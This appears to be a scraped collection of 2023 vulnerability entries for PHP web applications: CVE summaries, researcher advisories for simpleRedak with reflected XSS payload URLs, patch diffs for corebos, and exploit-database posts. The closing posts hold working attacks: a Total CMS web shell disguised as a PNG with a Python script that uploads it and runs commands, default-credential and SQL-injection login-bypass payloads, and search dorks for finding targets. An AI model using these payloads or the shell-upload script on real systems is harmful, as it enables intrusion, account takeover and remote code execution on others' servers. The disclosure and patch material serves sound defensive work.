The User Email Verification for WooCommerce plugin for WordPress is vulnerable to authentication bypass via authenticate_user_by_email in versions up to, and including, 3.5.0. This is due to a random token generation weakness in the resend_verification_email function. This allows unauthenticated attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Allow Automatic Login After Successful Verification setting to be enabled, which it is not by default.

CVE-2023-2781: class-xlwuev-woocommerce-confirmation-email-public.php in woo-confirmation-email/tags/3.5.0/public – WordPress Plugin Repository

eMedia Consulting simpleRedak up to v2.47.23.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /scheduler/index.php.

**eMedia Consulting simpleRedak - Reflected Cross-Site Scripting**

A reflected Cross-Site Scripting (XSS) vulnerability was discovered in the /scheduler/index.php component.

The vulnerability was reported as CVE-2023-33763.

**Versions affected: simpleRedak <= 2.47.23.05**

Figure 1: Reflected XSS via injecting a malicious string into a URL parameter

**Background**

An attacker may craft a malicious link that contains an XSS payload. Should the victim click on the link, this could lead to XSS in their browser window.

**Steps to Reproduce**

For the proof-of-concept screenshots we have used the following payload:

    <url>/module/scheduler/index.php?week=1e3czz%22%3E%3Cscript%3Ealert(%27Pentest%20Factory%20XSS,%20Location:%20%27%2bdocument.location)%3C%2fscript%3Eye23r&art=persoplan&cutter=1&activity=36&plan=1&format=678
    

**Root Cause**

This issue exists due to insufficient input filtering in a form that reflects the "week" parameter as an attribute value. By supplying a double quote character (") it is possible to break out of the attribute string and inject custom HTML.

Figure 2: Root cause: Insufficient input filtering in the reflected URL parameter

**Fix**

All software versions up to and including version 2.47.23.05 are affected. The vendor was informed of the finding on May 5, 2023. The vulnerability is fixed with version 2.47.23.06.

CVE-2023-33763: CVEs/CVE-2023-33763 at main · rauschecker/CVEs

eMedia Consulting simpleRedak up to v2.47.23.05 was discovered to contain a SQL injection vulnerability via the Activity parameter.

**eMedia Consulting simpleRedak - Blind SQL Injecction**

An SQL Injection vulnerability was discovered in the /module/scheduler/index.php component.

The vulnerability was reported as CVE-2023-33762.

**Versions affected: simpleRedak <= 2.47.23.05**

Figure 1: Request showing the vulnerable "activity" GET parameter

**Background**

An authenticated attacker with access to the scheduler (PR:L) may inject SQL commands into the "activity" GET parameter. This results in a blind SQL injection vector.

**Steps to Reproduce**

The following payload was detected via exemplary exploitation through SQLmap:

Figure 2: Exemplary exploitation with SQLmap

**Root Cause**

This issue exists due to not using parametrised queries. Only the usage of prepared statements or stored procedures with non-dynamic and previously bound parameters (“parametrised query”) can prevent SQL injection attacks.

**Fix**

All software versions up to and including version 2.47.23.05 are affected. The vendor was informed of the finding on May 5, 2023. The vulnerability is fixed with version 2.47.23.06.

CVE-2023-33762: CVEs/CVE-2023-33762 at main · rauschecker/CVEs

eMedia Consulting simpleRedak up to v2.47.23.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /view/cb/format_642.php.

**eMedia Consulting simpleRedak - Reflected Cross-Site Scripting**

A reflected Cross-Site Scripting (XSS) vulnerability was discovered in the /view/cb/format\_642.php component.

The vulnerability was reported as CVE-2023-33761.

**Versions affected: simpleRedak <= 2.47.23.05**

Figure 1: Reflected XSS via injecting a malicious string into a URL parameter

**Background**

An attacker may craft a malicious link that contains an XSS payload. Should the victim click on the link, this could lead to XSS in their browser window.

**Steps to Reproduce**

For the proof-of-concept screenshots we have used the following payload:

    <url>/module/castingbogen/view/cb/format_642.php/qyhgn%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eb0uud?code=dd3c28e36a&cast=2479882
    

**Root Cause**

This issue exists due to insufficient input filtering in a form that reflects the full URL in the "action" attribute value. By supplying a double quote character (") it is possible to break out of the attribute string and inject custom HTML.

Figure 2: Root cause: Insufficient input filtering in the reflected URL

**Fix**

All software versions up to and including version 2.47.23.05 are affected. The vendor was informed of the finding on May 5, 2023. The vulnerability is fixed with version 2.47.23.06.

CVE-2023-33761: CVEs/CVE-2023-33761 at main · rauschecker/CVEs

Cross-site Scripting (XSS) - Stored in GitHub repository tsolucio/corebos prior to 8.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Case Studies
    
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   In this repository All GitHub
    

*   No suggested jump to results

*   In this repository All GitHub
    
*   In this organization All GitHub
    
*   In this repository All GitHub
    

Sign in

Sign up

tsolucio / **corebos** Public

*   Notifications
*   Fork 142
*   Star 131
    

*   Code
*   Issues 102
*   Pull requests 2
*   Actions
*   Security
*   Insights

More

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

sec(Documents) sanitize and limit folder name and description

*   Loading branch information

joebordes committed

Jun 2, 2023

1 parent 5e87fbc commit e87f77c

Showing **1 changed file** with **2 additions** and **2 deletions**.

4 changes: 2 additions & 2 deletions modules/Documents/SaveFolder.php

Show comments View file

Expand Up

@@ -15,8 +15,8 @@

  

$local\_log = LoggerManager::getLogger('index');

$folderid = isset($\_REQUEST\['record'\]) ? vtlib\_purify($\_REQUEST\['record'\]) : '';

$foldername = utf8RawUrlDecode($\_REQUEST\['foldername'\]);

$folderdesc = utf8RawUrlDecode($\_REQUEST\['folderdesc'\]);

$foldername = substr(vtlib\_purify(trim(utf8RawUrlDecode($\_REQUEST\['foldername'\]))), 0, 20);

$folderdesc = substr(vtlib\_purify(trim(utf8RawUrlDecode($\_REQUEST\['folderdesc'\]))), 0, 50);

  

if (isset($\_REQUEST\['savemode'\]) && $\_REQUEST\['savemode'\] == 'Save') {

if ($folderid == '') {

Expand Down

**0 comments on commit e87f77c**

Please sign in to comment.

CVE-2023-3073: sec(Documents) sanitize and limit folder name and description · tsolucio/corebos@e87f77c

Unverified Password Change in GitHub repository tsolucio/corebos prior to 8.

Expand Up

@@ -621,20 +621,14 @@

Vtiger\_Request::validateRequest();

require\_once 'modules/Users/Users.php';

require\_once 'include/utils/UserInfoUtil.php';

require\_once 'include/Webservices/ChangePassword.php';

$userid = vtlib\_purify($\_REQUEST\['record'\]);

if (is\_admin($current\_user) || $current\_user\->id\==$userid) {

$focus = new Users();

$focus\->mode\='edit';

$focus\->id = $userid;

$focus\->retrieve\_entity\_info($userid, 'Users');

$ret = $focus\->change\_password('old\_password', vtlib\_purify(substr($\_REQUEST\['new\_password'\], 0, 1024)));

if ($ret) {

$ret = array('password'\=>$ret);

} else {

$ret = array('password'\=>false, 'msg' => $focus\->error\_string);

}

} else {

$ret = array('password'\=>false, 'msg' => $focus\->error\_string);

try {

$npass = vtlib\_purify($\_REQUEST\['new\_password'\]);

vtws\_changePassword(vtlib\_purify($\_REQUEST\['record'\]), 'nocheck\_old\_password', $npass, $npass, $current\_user);

$ret = array('password'\=>true);

} catch (\\Throwable $th) {

$ret = array('password'\=>false, 'msg' => $th\->getMessage());

}

break;

case 'ismoduleactive':

Expand Down

CVE-2023-3069: sec(Users) repeat password checks in backend before update · tsolucio/corebos@e3dabd7

A vulnerability classified as critical has been found in Campcodes Retro Cellphone Online Store 1.0. Affected is an unknown function of the file /admin/modal_add_product.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230580.

Permalink

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

197 KB

Download

*   Open with Desktop
*   Download
*   Delete file

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2023-3068: cve/Retro Cellphone Online Store.pdf at main · wordpress405/cve

Total CMS version 1.7.4 suffers from a remote shell upload vulnerability.

    # Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated) # Date: 03/06/2023# Exploit Author: tmrswrr# Version: 1.7.4# Vendor home page : https://www.totalcms.co/# Tested Url : https://www.totalcms.co/demo/soccer/#PLatform : MACOSX1) Go to this page and click edit page buttonhttps://localhost/demo/soccer/2)After go down and will you see downloads area 3)Add in this area shell.php file?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND4) After open this file and write commandshttps://localhosts/cms-data/depot/cmssoccerdepot/shell.php?cmd=idResult :?PNG ...uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)IEND Exploit: import requestsurl = input("Enter the URL: ")urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php"headers = {    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',    'Accept': 'application/json',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Cache-Control': 'no-cache',    'X-Requested-With': 'XMLHttpRequest',    'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17',    'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930',    'Origin': urll,    'Dnt': '1',    'Referer': f'{urll}/demo/soccer/admin/',    'Sec-Fetch-Dest': 'empty',    'Sec-Fetch-Mode': 'cors',    'Sec-Fetch-Site': 'same-origin',    'Te': 'trailers',    'Connection': 'close'}data = '''\-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="slug"\r\n\r\ncmssoccerdepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="type"\r\n\r\ndepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="file"; filename="hey.php"\r\nContent-Type: application/x-php\r\n\r\n?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND\r\n\r\n-----------------------------17104855723143716151436432930--'''while True:    command = input("WRITE YOUR COMMAND ('exit' to quit): ")    if command.lower() == "exit":        break    response = requests.post(url, headers=headers, data=data)    if response.status_code == 200:        shell_path = f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}'        shell_url = url + shell_path        print(shell_url)        shell_response = requests.get(shell_url)        print(shell_response.text)    else:        print('Failed to execute the request.')

Total CMS 1.7.4 Shell Upload

Inlislite version 3.1 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Inlislite V3.1 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://inlislite.perpusnas.go.id/?read=installerphp                                                               |  | # Dork      : Inlislite V3.1 © 2017 - 2018                                                                                       |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin[+] https://127.0.0.1.online/backend/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Inlislite 3.1 Insecure Settings

Biig Order version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ================================================================================| # Title     : E-commerce Biig Order CMS V2 Auth by Pass Vulnerability        || # Author    : indoushka                                                      || # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits)        | | # Vendor    : https://www.vaskar.in/                                         |  | # Dork      : "shop_detail.php?detail="                                      |================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : User & Pass : ' or 0=0 #[+] https://127.0.0.1/www/biigorder.com/admin/manage-order.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |===================================================================================================

Tag

#php